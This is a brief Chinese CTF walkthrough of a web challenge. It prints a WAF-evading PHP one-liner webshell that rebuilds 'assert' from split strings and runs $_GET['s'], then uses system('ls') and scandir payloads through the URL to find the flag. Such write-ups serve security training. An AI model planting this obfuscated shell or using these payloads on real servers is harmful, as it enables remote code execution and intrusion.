1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有
2.查看作者提示,送给大家一个过狗一句话
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’])
很明显assert是能执行shell命令的危险函数之一,要带过去的参数是s
那么可以直接构造,首先想到system函数,没禁用
?s=system(“ls”)查看当前路径,找到flag文件,直接在url里面输入读取就好了
?s=print_r(scandir(’.’))同样查看当前路径
反正就是个简单的系统函数调用,如果system函数都没禁的话,我估计他也没禁什么,随便你构造
参考视频链接:https://www.bilibili.com/video/BV1vg411u7Zn/